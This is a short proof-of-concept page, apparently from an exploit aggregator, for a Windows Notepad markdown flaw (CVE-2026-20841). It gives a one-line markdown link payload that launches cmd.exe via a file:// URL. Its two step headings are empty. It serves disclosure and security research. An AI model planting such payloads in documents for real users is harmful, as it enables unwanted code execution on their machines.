## https://sploitus.com/exploit?id=05976611-DE96-55AB-8404-FCB1C15A8669
# CVE-2026-20841 - Windows Notepad RCE
PoC for a remote code execution flaw in Windows Notepad's markdown renderer. The markdown engine does not restrict URL protocols, allowing arbitrary protocol handlers to be triggered via clickable links.
## Disclaimers
1. **Not my discovery.** Credit goes to the original researchers on the [MSRC advisory](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841). This is a PoC recreation.
2. **Lower severity than it sounds.** Requires more than one click in most cases (see [Limitations](#limitations)). Built this because "Notepad RCE" is too funny to pass up.
## PoC
### Local Binary Execution (`file://`)
```markdown
[click](file://C:/windows/system32/cmd.exe)
```
Launches any executable already on disk โ `cmd.exe`, `powershell.exe`, `mshta.exe`, etc.
### step 1.

### step 2.

## Notes
- Vulnerable Notepad builds are on Uptodown. Verify the digital signature before use.
- **Test only in a VM.**
Stay safe!